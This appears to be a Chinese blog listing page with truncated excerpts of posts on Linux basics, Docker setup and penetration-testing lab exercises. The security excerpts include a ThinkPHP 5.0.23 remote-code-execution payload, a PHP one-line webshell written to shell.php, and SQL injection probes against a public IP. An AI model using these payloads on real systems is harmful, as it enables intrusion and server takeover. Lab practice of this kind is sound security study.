- 博客(12)
- 收藏
- 关注
RSS订阅原创 linux网络与文件类型以及常见配置文件
一、linux目录结构一切从根开始,/是所有目录的起点bin目录:存放命令文件,sbin目录:管理员使用的命令etc目录:存放配置文件home目录:普通用户的家root目录:root的家dev目录:存放设备文件mnt目录:临时挂载目录var目录:存放系统日志、进程、服务usr目录:存放用户文件tmp目录:系统的临时文件二、linux的网络1、网卡配置文件路径:cd /etc/sysconfig/network-scripts解释:TYPE:上网类型BOOTPROTO:上网方
2022-04-13 10:54:22
5119
1
原创 Apache SSI 远程命令执行、Apache HTTPD 多后缀解析、Nginx 解析漏洞复现
(1)、Apache SSI 远程命令执行漏洞复现。环境搭建:上传一个php文件,提示不支持的上传的类型。上传一个shell.shtml文件,里面写入以下内容:浏览器访问上传的文件,下图可以看到成功执行代码,说明存在远程命令执行漏洞。原理:如果目标服务器开启了SSI与CGI支持;这样我们就可以上传一个可执行的shtml文件。(2)、Apache HTTPD 多后缀解析漏洞复现环境搭建路径为:/vulhub/httpd/apache_parsing_vulnerability 运行:
2022-04-12 19:12:09
4193
原创 复现ThinkPHP5 5.0.23远程代码执行漏洞
复现ThinkPHP5 5.0.23远程代码执行漏洞burpsuite进行抓包,修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。尝试写入phpinfo检测写入成功写入一句话木马:echo ‘<?php eval($_POST[aaa]); ?>’ > shell.
2022-04-12 19:01:16
1374
原创 ctf找flag
1、http://106.52.39.144 用御剑和burp suite 来去找到第二个flag ,操作步骤配截图。先搜索一下网站然后打开网站源代码搜索他的zd.txt得到第一个flag和字典,将字典复制出来,建立字典库将其放在御剑1.5的配置文件中用这个字典扫描这个网站双击网站打开并下载这个tar文件。...
2022-04-12 18:56:41
9599
1
原创 docker的基本操作
1、docker的基本操作更新安装docker验证doker是否安装成功使用docker,从docker镜像仓库下载镜像。查看镜像启动镜像: docker run -d -p81:80查看进程: docker ps进入容器:2、使用docker搭建sqli-lab环境以及upload-labs环境,操作步骤配截图。(1)搭建sqli-lib查找sqli-lab环境:docker search sqli-labs拉取镜像 docker pull acgpiano/sqli-l
2022-04-12 18:47:55
1422
原创 sql手注和udf提权
1、510cms使用手工注入挂下一句话木马。操作步骤配截图。http://159.75.16.25:88/about.php?listid=6 正常页面http://159.75.16.25:88/about.php?listid=6‘ 异常页面http://159.75.16.25:88/about.php?listid=6 and 1=1 – + 正常页面http://159.75.16.25:88/about.php?listid=6 and 1=2 – + 异常页面可以判断出为整形注入。
2022-04-12 18:41:50
979
原创 安装goby及解决无法扫描当前网卡
下载地址:https://gobies.org/下载完成解压安装包,双击Goby.exe文件即可运行。可以更改语言。扫描的时候出现解决措施:1)按照提示安装nacap网址:https://npcap.com/#download2)注册Goby账号并且进行登录登录的时候是自己的账户或者邮箱,密码是下图的密码,不是自己设置的密码。...
2022-03-31 21:02:10
4578
原创 使用docker搭建vulhub环境
启动docker;docker service images查看docker的状态:docker service status先安装docker-composesudo curl -L https://get.daocloud.io/docker/compose/releases/download/1.25.1/docker-compose-uname -s-uname -m -o /usr/local/bin/docker-compose添加执行权限:chmod +x /usr/local/bi
2022-02-27 20:17:31
1055
原创 ubuntu使用docker搭建xss挑战之旅环境
ubuntu使用docker搭建xss挑战之旅环境(1)启动dockerdocker systemctl start docker(2)下载docker-compose部署容器git clone https://gitee.com/banana_QIU/vulstudy(3)安装docker-composecurl -L “https://github.com/docker/compose/releases/download/1.25.0/docker-compose-(uname−s)−(un
2022-02-16 20:05:05
690
原创 kali安装dirsearch工具以及使用
安装之前建议先更新,更新要进入超级用户sudo suapt-get updatekali中安装命令:apt-get install dirsearch安装完成后输入命令:git clone https://github.com/maurosoria/dirsearch.git然后在家目录进入dirsearchcd dirsearch然后再使用命令:python3 dirsearch.py -u http://159.75.16.25 -e*...
2022-01-17 21:05:09
20568
3
原创 centos7 安装sogou输入法
基于ficitx安装搜狗输入法1.单独卸载ibus软件,rpm -e -–nodeps ibus2.安装epel库源yum -y install epel-release3.安装fcitx(小企鹅输入法)yum -y install fcitx fcitx-pinyin fcitx-configtool安装完成后,在界面左上角—应用程序—系统工具就会看到Fcitx,拖到桌面,双击就会在右上角日期左边出现一个键盘的图标。4.配置fcitx环境:在~/.bashrc中加入内容Vim ~/
2022-01-16 10:53:59
3783
1
原创 Finalshell连接虚拟机遇到java.net.ConnectException: Connection refused ;connectionconnect
在用finalshell连接虚拟机是出现如下图所示的问题:绞尽脑汁以为是端口号被占用,没想到是因为的的服务没有开启,通过查看虚拟机的IP地址为192.168.119.134需要在主机上连接虚拟机的ssh服务:ssh [email protected]然后再用命令/etc/init.d/ssh status回车,用来查看kali中SSH服务状态,在虚拟机kali安装ssh成功的基础上会显示 active(running)此时返回finalshell会发现已经连接值得注意的是:1.连接的
2022-01-12 10:20:13
31661
5
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人